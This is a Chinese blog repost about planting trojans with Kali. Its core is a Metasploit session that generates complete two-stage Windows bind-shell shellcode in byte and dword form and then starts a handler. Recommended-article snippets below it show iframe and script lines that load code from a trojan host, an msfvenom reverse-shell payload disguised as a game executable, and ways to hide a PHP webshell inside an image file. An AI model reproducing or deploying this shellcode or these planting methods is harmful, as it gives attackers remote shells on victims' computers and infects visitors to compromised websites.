kali之flash挂马

最新推荐文章于 2024-12-17 14:31:16 发布
最新推荐文章于 2024-12-17 14:31:16 发布
阅读量383 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: shell
原文链接:https://yq.aliyun.com/articles/496991

root@localhost:~# msfconsol

msf > show #寻求帮助

msf > use windows/shell/bind_tcp#
msf payload(bind_tcp) > set RHOST 192.168.48.100
RHOST => 192.168.48.100
msf payload(bind_tcp) > generate -tc
# windows/shell/bind_tcp - 298 bytes (stage 1)
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=192.168.48.100, 
# EnableStageEncoding=false, PrependMigrate=false, 
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb" +
"\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
"\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75" +
"\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9" +
"\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56" +
"\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56" +
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85" +
"\xf6\x75\xec\xc3"

# windows/shell/bind_tcp - 240 bytes (stage 2)
# http://www.metasploit.com
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" +
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" +
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" +
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" +
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" +
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" +
"\xff\xd5"
msf payload(bind_tcp) > generate -t dword
// windows/shell/bind_tcp - 298 bytes (stage 1)
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=192.168.48.100, 
// EnableStageEncoding=false, PrependMigrate=false, 
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x00323368, 0x73776800, 0x68545f32, 0x0726774c, 
0x90b8d5ff, 0x29000001, 0x685054c4, 0x006b8029, 0x5050d5ff, 0x50405050, 0xea685040, 0xffe0df0f, 
0xdb3197d5, 0x00026853, 0xe6895c11, 0x5756106a, 0x37dbc268, 0x53d5ff67, 0xe9b76857, 0xd5ffff38, 
0x68575353, 0xe13bec74, 0x9757d5ff, 0x4d6e7568, 0x6ad5ff61, 0x56046a00, 0xd9026857, 0xd5ff5fc8, 
0x406a368b, 0x00100068, 0x006a5600, 0x53a45868, 0x93d5ffe5, 0x56006a53, 0x02685753, 0xff5fc8d9, 
0x29c301d5, 0x75f685c6, 0x0000c3ec

// windows/shell/bind_tcp - 240 bytes (stage 2)
// http://www.metasploit.com
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x646d6368, 0x57e38900, 0xf6315757, 0x5659126a, 
0xc766fde2, 0x013c2444, 0x24448d01, 0x4400c610, 0x56565054, 0x4e564656, 0x56535656, 0x3fcc7968, 
0x89d5ff86, 0x46564ee0, 0x086830ff, 0xff601d87, 0xb5f0bbd5, 0xa66856a2, 0xff9dbd95, 0x7c063cd5, 
0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300
msf payload(bind_tcp) >  
msf payload(bind_tcp) > use exploit/multi/handler#监听
msf exploit(handler) > set payload windows/shell/bind_tcp#设置负载
payload => windows/shell/bind_tcp
msf exploit(handler) > run

[*] Starting the payload handler...
[*] Started bind handler










本文转自 周小玉 51CTO博客,原文链接:http://blog.51cto.com/maguangjie/1944417,如需转载请自行联系原作者
Kali [CobaltStrike]CS神器
weixin_45253622的博客
03-24 7832
CobaltStrike的使用 CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltSitrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 CobaliStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe木马生成,windows dll木马生成,java木马生成,office宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能! ......
渗透系列:DNS欺骗的艺术 | 域名劫持和网页挂马
weixin_54626591的博客
01-23 203
DNS欺骗的艺术 | 域名劫持和网页挂马
Flash挂马.rar
09-30
Flash挂马文章让你学习如何用Flash挂马,非常好的文章,强烈推荐
kali搭建Cobalt strike挂马
arissa666的博客
11-02 528
APT攻击是高级可持续化攻击,一般是团队分工合作红队用的渗透工具。多协议,端口,插件。
常见网站挂马方式 网站挂马可利用漏洞 网站加密挂马
ShenZ的博客
08-24 1107
网站挂马 常见挂马方式 框架(iframe)挂马 <iframe src=http://www.trojan.com/ width=0 height=0></iframe> //宽度和高度都为0 js文件挂马 <script src=http://www.trojan.com/1.js></script> //1.js文件中可能有恶意代码 js变形加密 <script language="JScript.Encode">
webshellkill网页挂马查杀
08-08
一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。 如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)或者利用当初的备份网站文件进行全覆盖
html网页挂马,浏览器安全之网页挂马实战 ——合天网安实验室学习笔记
weixin_29310605的博客
06-18 2947
实验连接网页挂马指的是把一个木马程序上传到网站里面,使得木马在打开网页时运行。网页挂马方式包括框架挂马、js文件挂马、body挂马、css挂马、图片假装等。经过实验了解网页挂马相关知识,学会使用框架挂马并进行相关利用。css实验简介实验所属系列: Web安全web实验对象: 本科/专科信息安全专业数据库相关课程及专业: 计算机基础、HTML、Linuxapache实验类别: 实践实验类vim预备知...
kali渗透学习-Web渗透XSS(一)
weixin_43239236的博客
01-23 647
XSS xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户浏览器的控制。漏洞存在于服务器端,攻击对象为WEB客户端。【原理:为了使用户体验更好等因素,有部分代码会在浏览器中执行】 【JavaScript详解】:与java语言无关;命名完全出于市场原因,是使用最广的客户端脚本语言 使用场景:针对以下几个点位注入 直接嵌入html:<scr
交换机攻击技术进一步利用----实现网页挂马
大年三十
10-10 2466
       今天老调重弹,再聊下交换机攻击技术,有位朋友说,这种攻击技术没有可利用的价值,纯属恶意攻击造成大面积网络瘫痪,给木马作者带来不了大的利用价值,那么这种技术就不会流行。我当时就对他的想法抱有偏见,我总感觉这是安全防护的一个根基,网络都不通了还谈什么网络安全。只是有没有它的利用价值和流行的趋势。        SSClone工具的出现更奠定了我的这一想法,也许是各自理解的不同,工
浏览器安全之网页挂马实战 ——合天网安实验室学习笔记
weixin_42582241的博客
03-04 9429
实验链接 网页挂马指的是把一个木马程序上传到网站里面,使得木马在打开网页时运行。网页挂马方式包括框架挂马、js文件挂马、body挂马、css挂马、图片伪装等。通过实验了解网页挂马相关知识,学会使用框架挂马并进行相关利用。 链接:http://www.hetianlab.com/expc.do?ce=f25a4f6b-ba35-4490-9d00-60acf926acd0 实验简介 实验所属系列: ...
基于内网dns劫持与网页挂马实测案例
qq_36585338的博客
11-26 2327
关于dns劫持与flush钓鱼挂马的一次真实案例复现,其中包括cs打枪神器的使用测试
做一个图片马(图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码_图片马制作
最新发布
韩束一叶子
12-17 2611
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
kali系统中使用weevely创建木马(合并成图片木马)
qq_44635376的博客
01-29 7883
这里写目录标题weevely:kali中的军刀图片木马 weevely:kali中的军刀 创建木马: weevely generate <password> filename.php 连接木马: weevely [url] <password> 图片木马 windows环境制作木马之copy命令 copy image.png/b + muma.php picmuma.png linux环境制作木马之cat命令 cat image.png muma.php > picmum
用虚拟机给自己真机挂马。(metasploit)
m0_49589385的博客
02-18 346
环境: 真机:win10 虚拟机:kali。 (此文章不展示图片) 打开kali的终端。 输入 msfvenom -p windows/meterpreter/reverse_tcp -i 5 LHOST = [虚拟机ip] LPORT=8080 -f exe > game.exe #生成程序 生成完后输入 msfconsole 打开metasploit。 use exploit/multi/handler #使用模快 set LHOST [虚拟机IP] set LPORT 8080 #端口必须与
我的shellcode之旅
如鹿渴慕泉水的专栏
03-27 1954
c代码 // !!!注意:文件后缀名为.c全名TcpKali.c #include<windows.h> #include<stdio.h> #include<string.h> //192, 168, 0, 12, 0x41为IP地址,端口号\x1e\x6c=>7788 unsigned char shellcode[] = { 0xFC, 0x48...
【XSS漏洞】通过XSS实现网页挂马
Monsterlz123的博客
06-07 8964
【XSS漏洞】通过XSS实现网页挂马 Hello,各位小伙伴们大家好~ 端午假期第一天,大家玩嗨了嘛? 小编是玩嗨了,毕竟已经拖更五天了… 好啦,直接进入正题吧,前面也写了两期XSS相关的内容,今天就来点高大上的(并不是!),我们来通过XSS实现网页挂马吧~ 一、准备工作 实验拓扑: 实验分为两部分: 1、通过Kali linux,利用MS14_064漏洞,制作一个木马服务器。存在该漏洞的...
小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞
ZiXuanFY的博客
10-21 5615
手动漏洞挖掘 即扫描后,如何对发现的漏洞告警进行验证。 #默认安装 流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。 漏洞类型--远程命令执行 1、phpMyadmin 安装在web服务器中的web接口,专门用来管理MySQL数
网页挂马类型
安静
06-01 1352
一:框架挂马 二:js文件挂马首先将以下代码document.write("");保存为xxx.js,则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀四:body挂马五:隐蔽挂马top.document.body.innerHTML = top.document.body.innerHTML + /r/n;六:css中挂马body { background-image: ur
图片木马制作的三种方法
热门推荐
whatday的专栏
01-25 6万+
1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 2.Uedit32 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值